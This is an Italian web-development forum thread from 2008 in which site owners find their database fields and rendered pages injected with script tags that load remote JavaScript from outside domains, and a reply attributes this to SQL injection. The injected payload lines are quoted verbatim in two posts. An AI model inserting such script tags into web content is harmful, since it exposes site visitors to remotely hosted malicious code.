Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Visualizzazione dei risultati da 1 a 4 su 4
  1. 08-07-2008, 19:32 #1
    cheen77
    cheen77 non è in linea
    Utente di HTML.it
    Registrato dal
    Jan 2006
    Messaggi
    36

    URGENTE "script src=http://www.bnradd.mobi/ngg.js"

    Ciao a tutti oggi mi sono accorto che il sito a cui sto lavorando
    non funzionava, controllando il database mi sono accorto che tutte le colonne presentavano davanti ai dati (es. nome utente) lo scritp messo in oggetto...qualcuno sa di cosa si tratta..soluzioni..è grave??

    NB: Con delle queri abbiamo risolto il problema cancellando lo script
    pero abbiamo paura che si possa ripetere...
    Rispondi quotando Rispondi quotando
  2. 08-07-2008, 19:40 #2
    Shores
    Shores non è in linea
    Utente di HTML.it L'avatar di Shores
    Registrato dal
    May 2001
    Messaggi
    3,805
    Si, la presenza di quello script significa che il vostro codice è vulnerabile alla SQL injection, dovete SUBITO correggerlo.

    Ciao!
    "Le uniche cose che sbagli sono quelle che non provi a fare."
    Atipica
    Rispondi quotando Rispondi quotando
  3. 01-12-2008, 17:24 #3
    sili
    sili non è in linea
    Utente di HTML.it
    Registrato dal
    Nov 2001
    Messaggi
    96
    Ciao a tutti,
    oggi mi sono accorta che è successo lo stesso anche ad uno dei vecchi siti che controllo. Sono cosciente che il sito non è fatto per evitare le sql injection, però quello che non capisco è come sia possibile che a partire da delle sql injection, e quindi scrivendo la riga di script in vari record, possano modificare una parte del codice Javascript della pagina. Qui sotto le tre righe di codice Javascript presenti tutt'ora sul server nella pagina .asp:

    if(visit == 1)
    {
    //newwindow=window.open('/promo1.htm','Tarif','scrollbars=no,width=350,heigh t=155');
    newwindow=window.open('/pop_home.asp?id=1&flash=<%= flg_flash1%>','Tarif','scrollbars=no,width=<%=widt h1%>,height=<%=height1%>');
    newwindow.creator=self;
    }

    qui di seguito le stesse righe visibili nel codice Html della pagina visualizzata dal browser del client:

    if(visit == 1)
    {
    //newwindow=window.open('/promo1.htm','Tarif','scrollbars=no,width=350,heigh t=155');
    newwindow=window.open('/pop_home.asp?id=1&flash=0','Tarif','scrollbars=no, width=350<script src=http://www.sdkj.ru/ngg.js></script>,height=270<script src=http://www.sdkj.ru/ngg.js></script>');
    newwindow.creator=self;
    }
    questa è una funzione Javascript che apre una popup, ed è in testa alla pagina asp. Non mi pare possibile che prenda questo script da una delle tabelle modificate nel DB.

    Mi aiutate a capire?
    ciao
    Sili VVoVe:
    Rispondi quotando Rispondi quotando
  4. 04-12-2008, 10:15 #4
    sili
    sili non è in linea
    Utente di HTML.it
    Registrato dal
    Nov 2001
    Messaggi
    96
    OK, scusate, ho capito da sola!
    le variabili vengono pescate dal DB. Molto semplice!!!

    ciao e grazie a tutti lo stesso
    Sili
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.